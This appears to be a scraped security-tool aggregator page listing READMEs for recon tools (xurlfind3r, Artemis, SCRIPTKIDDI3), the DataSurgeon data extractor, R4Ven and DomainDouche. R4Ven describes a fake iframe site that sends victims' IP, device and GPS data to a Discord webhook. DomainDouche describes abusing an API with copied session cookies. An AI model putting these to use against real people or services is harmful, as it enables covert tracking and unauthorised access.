    • By using this software you acknowledge that you are responsible for your actions and assume all liability for any direct, indirect, or other damages


    Xurlfind3R - A CLI Utility To Find Domain'S Known URLs From Curated Passive Online Sources

    By: Zion3R


    xurlfind3r is a command-line interface (CLI) utility to find domain's known URLs from curated passive online sources.


    Features

    Installation

    Install release binaries (Without Go Installed)

    Visit the releases page and find the appropriate archive for your operating system and architecture. Download the archive from your browser or copy its URL and retrieve it with wget or curl:

    • ...with wget:

       wget https://github.com/hueristiq/xurlfind3r/releases/download/v<version>/xurlfind3r-<version>-linux-amd64.tar.gz
    • ...or, with curl:

       curl -OL https://github.com/hueristiq/xurlfind3r/releases/download/v<version>/xurlfind3r-<version>-linux-amd64.tar.gz

    ...then, extract the binary:

    tar xf xurlfind3r-<version>-linux-amd64.tar.gz

    TIP: The above steps, download and extract, can be combined into a single step with this onliner

    curl -sL https://github.com/hueristiq/xurlfind3r/releases/download/v<version>/xurlfind3r-<version>-linux-amd64.tar.gz | tar -xzv

    NOTE: On Windows systems, you should be able to double-click the zip archive to extract the xurlfind3r executable.

    ...move the xurlfind3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

    sudo mv xurlfind3r /usr/local/bin/

    NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xurlfind3r to their PATH.

    Install source (With Go Installed)

    Before you install from source, you need to make sure that Go is installed on your system. You can install Go by following the official instructions for your operating system. For this, we will assume that Go is already installed.

    go install ...

    go install -v github.com/hueristiq/xurlfind3r/cmd/xurlfind3r@latest

    go build ... the development Version

    • Clone the repository

       git clone https://github.com/hueristiq/xurlfind3r.git 
    • Build the utility

       cd xurlfind3r/cmd/xurlfind3r && \
      go build .
    • Move the xurlfind3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

       sudo mv xurlfind3r /usr/local/bin/

      NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xurlfind3r to their PATH.

    NOTE: While the development version is a good way to take a peek at xurlfind3r's latest features before they get released, be aware that it may have bugs. Officially released versions will generally be more stable.

    Post Installation

    xurlfind3r will work right after installation. However, BeVigil, Github and Intelligence X require API keys to work, URLScan supports API key but not required. The API keys are stored in the $HOME/.hueristiq/xurlfind3r/config.yaml file - created upon first run - and uses the YAML format. Multiple API keys can be specified for each of these source from which one of them will be used.

    Example config.yaml:

    version: 0.2.0
    sources:
    - bevigil
    - commoncrawl
    - github
    - intelx
    - otx
    - urlscan
    - wayback
    keys:
    bevigil:
    - awA5nvpKU3N8ygkZ
    github:
    - d23a554bbc1aabb208c9acfbd2dd41ce7fc9db39
    - asdsd54bbc1aabb208c9acfbd2dd41ce7fc9db39
    intelx:
    - 2.intelx.io:00000000-0000-0000-0000-000000000000
    urlscan:
    - d4c85d34-e425-446e-d4ab-f5a3412acbe8

    Usage

    To display help message for xurlfind3r use the -h flag:

    xurlfind3r -h

    help message:

                     _  __ _           _ _____      
    __ ___ _ _ __| |/ _(_)_ __ __| |___ / _ __
    \ \/ / | | | '__| | |_| | '_ \ / _` | |_ \| '__|
    > <| |_| | | | | _| | | | | (_| |___) | |
    /_/\_\\__,_|_| |_|_| |_|_| |_|\__,_|____/|_| v0.2.0

    USAGE:
    xurlfind3r [OPTIONS]

    TARGET:
    -d, --domain string (sub)domain to match URLs

    SCOPE:
    --include-subdomains bool match subdomain's URLs

    SOURCES:
    -s, --sources bool list sources
    -u, --use-sources string sources to use (default: bevigil,commoncrawl,github,intelx,otx,urlscan,wayback)
    --skip-wayback-robots bool with wayback, skip parsing robots.txt snapshots
    --skip-wayback-source bool with wayback , skip parsing source code snapshots

    FILTER & MATCH:
    -f, --filter string regex to filter URLs
    -m, --match string regex to match URLs

    OUTPUT:
    --no-color bool no color mode
    -o, --output string output URLs file path
    -v, --verbosity string debug, info, warning, error, fatal or silent (default: info)

    CONFIGURATION:
    -c, --configuration string configuration file path (default: ~/.hueristiq/xurlfind3r/config.yaml)

    Examples

    Basic

    xurlfind3r -d hackerone.com --include-subdomains

    Filter Regex

    # filter images
    xurlfind3r -d hackerone.com --include-subdomains -f '`^https?://[^/]*?/.*\.(jpg|jpeg|png|gif|bmp)(\?[^\s]*)?$`'

    Match Regex

    # match js URLs
    xurlfind3r -d hackerone.com --include-subdomains -m '^https?://[^/]*?/.*\.js(\?[^\s]*)?$'

    Contributing

    Issues and Pull Requests are welcome! Check out the contribution guidelines.

    Licensing

    This utility is distributed under the MIT license.



    Artemis - A Modular Web Reconnaissance Tool And Vulnerability Scanner

    By: Zion3R


    A modular web reconnaissance tool and vulnerability scanner based on Karton (https://github.com/CERT-Polska/karton).

    The Artemis project has been initiated by the KN Cyber science club of Warsaw University of Technology and is currently being maintained by CERT Polska.

    Artemis is experimental software, under active development - use at your own risk.

    Features

    For an up-to-date list of features, please refer to the documentation.

    Development

    Tests

    To run the tests, use:

    ./scripts/test

    Code formatting

    Artemis uses pre-commit to run linters and format the code. pre-commit is executed on CI to verify that the code is formatted properly.

    To run it locally, use:

    pre-commit run --all-files

    To setup pre-commit so that it runs before each commit, use:

    pre-commit install

    Building the docs

    To build the documentation, use:

    cd docs
    python3 -m venv venv
    . venv/bin/activate
    pip install -r requirements.txt
    make html

    How do I write my own module?

    Please refer to the documentation.

    Contributing

    Contributions are welcome! We will appreciate both ideas for new Artemis modules (added as GitHub issues) as well as pull requests with new modules or code improvements.

    However obvious it may seem we kindly remind you that by contributing to Artemis you agree that the BSD 3-Clause License shall apply to your input automatically, without the need for any additional declarations to be made.



    Scriptkiddi3 - Streamline Your Recon And Vulnerability Detection Process With SCRIPTKIDDI3, A Recon And Initial Vulnerability Detection Tool Built Using Shell Script And Open Source Tools


    Streamline your recon and vulnerability detection process with SCRIPTKIDDI3, A recon and initial vulnerability detection tool built using shell script and open source tools.

    How it works β€’ Installation β€’ Usage β€’ MODES β€’ For Developers β€’ Credits

    Introducing SCRIPTKIDDI3, a powerful recon and initial vulnerability detection tool for Bug Bounty Hunters. Built using a variety of open-source tools and a shell script, SCRIPTKIDDI3 allows you to quickly and efficiently run a scan on the target domain and identify potential vulnerabilities.

    SCRIPTKIDDI3 begins by performing recon on the target system, collecting information such as subdomains, and running services with nuclei. It then uses this information to scan for known vulnerabilities and potential attack vectors, alerting you to any high-risk issues that may need to be addressed.

    In addition, SCRIPTKIDDI3 also includes features for identifying misconfigurations and insecure default settings with nuclei templates, helping you ensure that your systems are properly configured and secure.

    SCRIPTKIDDI3 is an essential tool for conducting thorough and effective recon and vulnerability assessments. Let's Find Bugs with SCRIPTKIDDI3

    [Thanks ChatGPT for the Description]


    How it Works ?

    This tool mainly performs 3 tasks

    1. Effective Subdomain Enumeration from Various Tools
    2. Get URLs with open HTTP and HTTPS service.
    3. Run a Nuclei and other scans on previous output So basically, this is an autmation script for your initial recon in bugbounty

    Install SCRIPTKIDDI3

    SCRIPTKIDDI3 requires different tools to run successfully. Run the following command to install the latest version with all requirments-

    git clone https://github.com/thecyberneh/scriptkiddi3.git
    cd scriptkiddi3
    bash installer.sh

    Usage

    scriptkiddi3 -h

    This will display help for the tool. Here are all the switches it supports.

    Vulnerability Detection with Nuclei, and Scan for SUBDOMAINE TAKEOVER [FLAGS:] [TARGET:] -d, --domain target domain to scan [CONFIG:] -c, --config path of your configuration file for subfinder [HELP:] -h, --help to get help menu [UPDATE:] -u, --update to update tool [Examples:] Run scriptkiddi3 in full Exploitation mode scriptkiddi3 -m EXP -d target.com Use your own CONFIG file for subfinder scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml Run scriptkiddi3 in SUBDOMAIN ENUMERATION mode scriptkiddi3 -m SUB -d target.com Run scriptkiddi3 in URL ENUMERATION mode scriptkiddi3 -m SUB -d target.com " dir="auto">
    [ABOUT:]
    Streamline your recon and vulnerability detection process with SCRIPTKIDDI3,
    A recon and initial vulnerability detection tool built using shell script and open source tools.


    [Usage:]
    scriptkiddi3 [MODE] [FLAGS]
    scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml


    [MODES:]
    ['-m'/'--mode']
    Available Options for MODE:
    SUB | sub | SUBDOMAIN | subdomain Run scriptkiddi3 in SUBDOMAIN ENUMERATION mode
    URL | url Run scriptkiddi3 in URL ENUMERATION mode
    EXP | exp | EXPLOIT | exploit Run scriptkiddi3 in Full Exploitation mode


    Feature of EXPLOI mode : subdomain enumaration, URL Enumeration,
    Vulnerability Detection with Nuclei,
    an d Scan for SUBDOMAINE TAKEOVER

    [FLAGS:]
    [TARGET:] -d, --domain target domain to scan

    [CONFIG:] -c, --config path of your configuration file for subfinder

    [HELP:] -h, --help to get help menu

    [UPDATE:] -u, --update to update tool

    [Examples:]
    Run scriptkiddi3 in full Exploitation mode
    scriptkiddi3 -m EXP -d target.com


    Use your own CONFIG file for subfinder
    scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml


    Run scriptkiddi3 in SUBDOMAIN ENUMERATION mode
    scriptkiddi3 -m SUB -d target.com


    Run scriptkiddi3 in URL ENUMERATION mode
    scriptkiddi3 -m SUB -d target.com

    MODES

    1. FULL EXPLOITATION MODE

    Run SCRIPTKIDDI3 in FULL EXPLOITATION MODE

      scriptkiddi3 -m EXP -d target.com

    FULL EXPLOITATION MODE contains following functions

    • Effective Subdomain Enumeration with different services and open source tools
    • Effective URL Enumeration ( HTTP and HTTPs service )
    • Run Vulnerability Detection with Nuclei
    • Subdomain Takeover Test on previous results

    2. SUBDOMAIN ENUMERATION MODE

    Run scriptkiddi3 in SUBDOMAIN ENUMERATION MODE

      scriptkiddi3 -m SUB -d target.com

    SUBDOMAIN ENUMERATION MODE contains following functions

    • Effective Subdomain Enumeration with different services and open source tools
    • You can use this mode if you only want to get subdomains from this tool or we can say Automation of Subdmain Enumeration by different tools

    3. URL ENUMERATION MODE

    Run scriptkiddi3 in URL ENUMERATION MODE

      scriptkiddi3 -m URL -d target.com

    URL ENUMERATION MODE contains following functions

    • Same Feature as SUBDOMAIN ENUMERATION MODE but also identifies HTTP or HTTPS service

    Using your own CONFIG File for subfinder

      scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml

    You can also provie your own CONDIF file with your API Keys for subdomain enumeration with subfinder

    Updating tool to latest version You can run following command to update tool

      scriptkiddi3 -u

    An Example of config.yaml

    binaryedge:
    - 0bf8919b-aab9-42e4-9574-d3b639324597
    - ac244e2f-b635-4581-878a-33f4e79a2c13
    censys:
    - ac244e2f-b635-4581-878a-33f4e79a2c13:dd510d6e-1b6e-4655-83f6-f347b363def9
    certspotter: []
    passivetotal:
    - sample-email@user.com:sample_password
    securitytrails: []
    shodan:
    - AAAAClP1bJJSRMEYJazgwhJKrggRwKA
    github:
    - ghp_lkyJGU3jv1xmwk4SDXavrLDJ4dl2pSJMzj4X
    - ghp_gkUuhkIYdQPj13ifH4KA3cXRn8JD2lqir2d4
    zoomeye:
    - zoomeye_username:zoomeye_password

    For Developers

    If you have ideas for new functionality or modes that you would like to see in this tool, you can always submit a pull request (PR) to contribute your changes.

    If you have any other queries, you can always contact me on Twitter(thecyberneh)

    Credits

    I would like to express my gratitude to all of the open source projects that have made this tool possible and have made recon tasks easier to accomplish.



    DataSurgeon - Quickly Extracts IP's, Email Addresses, Hashes, Files, Credit Cards, Social Secuirty Numbers And More From Text


    Β DataSurgeon (ds) is a versatile tool designed for incident response, penetration testing, and CTF challenges. It allows for the extraction of various types of sensitive information including emails, phone numbers, hashes, credit cards, URLs, IP addresses, MAC addresses, SRV DNS records and a lot more!

    • Supports Windows, Linux and MacOS

    Extraction Features

    • Emails
    • Files
    • Phone numbers
    • Credit Cards
    • Google API Private Key ID's
    • Social Security Numbers
    • AWS Keys
    • Bitcoin wallets
    • URL's
    • IPv4 Addresses and IPv6 addresses
    • MAC Addresses
    • SRV DNS Records
    • Extract Hashes
      • MD4 & MD5
      • SHA-1, SHA-224, SHA-256, SHA-384, SHA-512
      • SHA-3 224, SHA-3 256, SHA-3 384, SHA-3 512
      • MySQL 323, MySQL 41
      • NTLM
      • bcrypt

    Want more?

    Please read the contributing guidelines here

    Quick Install

    Install Rust and Github

    Linux

    wget -O - https://raw.githubusercontent.com/Drew-Alleman/DataSurgeon/main/install/install.sh | bash

    Windows

    Enter the line below in an elevated powershell window.

    IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/Drew-Alleman/DataSurgeon/main/install/install.ps1")

    Relaunch your terminal and you will be able to use ds from the command line.

    Mac

    curl --proto '=https' --tlsv1.2 -sSf https://raw.githubusercontent.com/Drew-Alleman/DataSurgeon/main/install/install.sh | sh

    Command Line Arguments



    Video Guide

    Examples

    Extracting Files From a Remote Webiste

    Here I use wget to make a request to stackoverflow then I forward the body text to ds . The -F option will list all files found. --clean is used to remove any extra text that might have been returned (such as extra html). Then the result of is sent to uniq which removes any non unique files found.

     wget -qO - https://www.stackoverflow.com | ds -F --clean | uniq


    Extracting Mac Addresses From an Output File

    Here I am pulling all mac addresses found in autodeauth's log file using the -m query. The --hide option will hide the identifer string infront of the results. In this case 'mac_address: ' is hidden from the output. The -T option is used to check the same line multiple times for matches. Normallly when a match is found the tool moves on to the next line rather then checking again.

    $ ./ds -m -T --hide -f /var/log/autodeauth/log     
    2023-02-26 00:28:19 - Sending 500 deauth frames to network: BC:2E:48:E5:DE:FF -- PrivateNetwork
    2023-02-26 00:35:22 - Sending 500 deauth frames to network: 90:58:51:1C:C9:E1 -- TestNet

    Reading all files in a directory

    The line below will will read all files in the current directory recursively. The -D option is used to display the filename (-f is required for the filename to display) and -e used to search for emails.

    $ find . -type f -exec ds -f {} -CDe \;


    Speed Tests

    When no specific query is provided, ds will search through all possible types of data, which is SIGNIFICANTLY slower than using individual queries. The slowest query is --files. Its also slightly faster to use cat to pipe the data to ds.

    Below is the elapsed time when processing a 5GB test file generated by ds-test. Each test was ran 3 times and the average time was recorded.

    Computer Specs

    Processor	Intel(R) Core(TM) i5-10400F CPU @ 2.90GHz, 2904 Mhz, 6 Core(s), 12 Logical Processor(s)
    Ram 12.0 GB (11.9 GB usable)

    Searching all data types

    Command Speed
    cat test.txt | ds -t 00h:02m:04s
    ds -t -f test.txt 00h:02m:05s
    cat test.txt | ds -t -o output.txt 00h:02m:06s

    Using specific queries

    Command Speed Query Count
    cat test.txt | ds -t -6 00h:00m:12s 1
    cat test.txt | ds -t -i -m 00h:00m:22 2
    cat test.txt | ds -tF6c 00h:00m:32s 3

    Project Goals

    • JSON and CSV output
    • Untar/unzip and a directorty searching mode
    • Base64 Detection and decoding


    R4Ven - Track Ip And GPS Location

    Track User's Smartphone/Pc Ip And Gps Location.

    The tool hosts a fake website which uses an iframe to display a legit website and, if the target allows it, it will fetch the Gps location (latitude and longitude) of the target along with IP Address and Device Information.

    This tool is a Proof of Concept and is for Educational Purposes Only.

    Using this tool, you can find out what information a malicious website can gather about you and your devices and why you shouldn't click on random links or grant permissions like Location to them.


    On link click

    + it wil automatically fetch ip address and device information
    ! if location permission allowed, it will fetch exact location of target.

    Limitation

    browsers that block javascript, # or if the user is mocking the GPS location. " dir="auto">
    - It will not work on laptops or phones that have broken GPS, 
    # browsers that block javascript,
    # or if the user is mocking the GPS location.

    IP location vs GPS location

    - Geographic location based on IP address is NOT accurate,
    # Does not provide the location of the target.
    # Instead, it provides the approximate location of the ISP (Internet service provider)
    longitude and latitude coordinates. @@ Once location permission is granted @@ # accurate location information is recieved to within 20 to 30 meters of the user's location. # (it's almost exact location)" dir="auto">
    + GPS fetch almost exact location because it uses longitude and latitude coordinates.
    @@ Once location permission is granted @@
    # accurate location information is recieved to within 20 to 30 meters of the user's location.
    # (it's almost exact location)

    Installation

    git clone https://github.com/spyboy-productions/r4ven.git
    cd r4ven
    pip3 install -r requirements.txt
    python3 r4ven.py

    enter your discord webhook url (set up a channel in your discord server with webhook integration)

    https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks

    if not have discord account and sever make one, it's free.

    https://discord.com/

    
    Track info data will be sent to your discord webhook channel.
    • why discord webhook? Conveniently, you will receive a notification when someone clicks on the link.

    To chnage website template

    • open file index.html on line 12 and replace the src in the iframe. (Note: not every website support iframe)


    To port forward install ngrok or use ssh

    • For ngrok port forward type: ngrok http 8000
    • For ssh port forwarding type: ssh -R 80:localhost:8000 ssh.localhost.run

    Snapshots



    DomainDouche - OSINT Tool to Abuse SecurityTrails Domain Suggestion API To Find Potentially Related Domains By Keyword And Brute Force


    Abusing SecurityTrails domain suggestion API to find potentially related domains by keyword and brute force.

    Use it while it still works


    (Also, hmu on Mastodon: @n0kovo@infosec.exchange)


    Usage:

    usage: domaindouche.py [-h] [-n N] -c COOKIE -a USER_AGENT [-w NUM] [-o OUTFILE] keyword

    Abuses SecurityTrails API to find related domains by keyword.
    Go to https://securitytrails.com/dns-trails, solve any CAPTCHA you might encounter,
    copy the raw value of your Cookie and User-Agent headers and use them with the -c and -a arguments.

    positional arguments:
    keyword keyword to append brute force string to

    options:
    -h, --help show this help message and exit
    -n N, --num N number of characters to brute force (default: 2)
    -c COOKIE, --cookie COOKIE
    raw cookie string
    -a USER_AGENT, --useragent USER_AGENT
    user-agent string (must match the browser where the cookies are from)
    -w NUM, --workers NUM
    number of workers (default: 5)
    -o OUTFILE, --output OUTFILE
    output file path


    ❌